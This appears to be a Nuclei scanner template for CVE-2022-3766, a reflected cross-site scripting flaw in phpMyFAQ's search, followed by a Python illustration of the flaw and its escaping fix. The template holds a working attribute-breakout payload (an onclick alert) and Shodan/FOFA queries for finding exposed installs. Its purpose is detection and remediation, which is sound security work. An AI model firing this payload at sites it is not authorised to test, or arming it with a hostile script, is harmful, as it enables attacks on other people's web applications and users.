phpMyFAQ versions prior to 3.1.8 contain a reflected cross-site scripting vulnerability in the search functionality. The application fails to properly sanitize user input in the search parameter, allowing attackers to inject and execute malicious JavaScript code in the context of other users' browsers.
PoC code [public]
id: CVE-2022-3766

info:
  name: phpMyFAQ < 3.1.8 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    phpMyFAQ versions prior to 3.1.8 contain a reflected cross-site scripting vulnerability in the search functionality. The application fails to properly sanitize user input in the search parameter, allowing attackers to inject and execute malicious JavaScript code in the context of other users' browsers.
  impact: |
    An attacker can execute arbitrary JavaScript in the victim's browser context
  remediation: |
    Upgrade phpMyFAQ to version 3.1.8 or later
  reference:
    - https://huntr.dev/bounties/d9666520-4ff5-43bb-aacf-50c8e5570983
    - https://github.com/thorsten/phpMyFAQ/commit/c7904f2236c6c0dd64c2226b90c30af0f7e5a72d
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3766
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-3766
    cwe-id: CWE-79
    epss-score: 0.34649
    epss-percentile: 0.96889
    cpe: cpe:2.3:a:phpmyfaq:phpmyfaq:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    verified: true
    vendor: phpmyfaq
    product: phpmyfaq
    shodan-query: http.html:"phpmyfaq"
    fofa-query: body="phpmyfaq"
  tags: cve,cve2022,phpmyfaq,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?search=1af%22+onclick%3D'alert(document.domain)'"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "value=\"1af\" onclick='alert(document.domain)'"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a00463044022056ff7f7f6d251e8f76c3b740779a05aca76e6f53c2d96206779f2cfb0f73398302207e53836a615b4e32f583dd3260545b8b6ec4c153eb12735c40226f8a097b01ea:922c64590222798bb761d5b6d8e72950
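As an added illustration (not phpMyFAQ's own code, which is PHP, and not part of the template above), the Python below models the attribute-context reflection the description refers to, shows why escaping only angle brackets does not stop it, applies the two-quote escaping that does (the equivalent of PHP's htmlspecialchars with ENT_QUOTES), and mirrors the template's three matchers so the fixed rendering can be checked against them. The render functions and MATCHER_WORD are assumptions for illustration; the search term is the one the template's request path sends.

```python
import html
from urllib.parse import unquote_plus

# Constructed sample: the search value from the template's request path,
# decoded as a web server would (%22 -> ", %3D -> =, + -> space).
SEARCH_PARAM = unquote_plus("1af%22+onclick%3D'alert(document.domain)'")

# The string the template's body matcher looks for in the response.
MATCHER_WORD = "value=\"1af\" onclick='alert(document.domain)'"


def render_search_box_vulnerable(term: str) -> str:
    """Reflects the term into a value="" attribute verbatim: the flaw.
    A double quote in the term closes the attribute and the rest of the
    term becomes new attributes, here an onclick handler."""
    return f'<input type="text" name="search" value="{term}">'


def render_search_box_tags_only(term: str) -> str:
    """Escapes only < and >. This blocks <script> injection but not
    attribute breakout, because the payload contains no angle brackets."""
    safe_tags = term.replace("<", "&lt;").replace(">", "&gt;")
    return f'<input type="text" name="search" value="{safe_tags}">'


def render_search_box_fixed(term: str) -> str:
    """Escapes &, <, >, " and ' before reflecting the term (quote=True),
    so the term can never terminate the surrounding attribute."""
    safe_attr = html.escape(term, quote=True)
    return f'<input type="text" name="search" value="{safe_attr}">'


def template_matches(body: str, content_type: str = "text/html",
                     status: int = 200) -> bool:
    """Mirror the template: body word AND text/html header AND status 200."""
    return MATCHER_WORD in body and "text/html" in content_type and status == 200
```

Running the three renderers on SEARCH_PARAM shows the first two still satisfy the matcher while the fixed one does not.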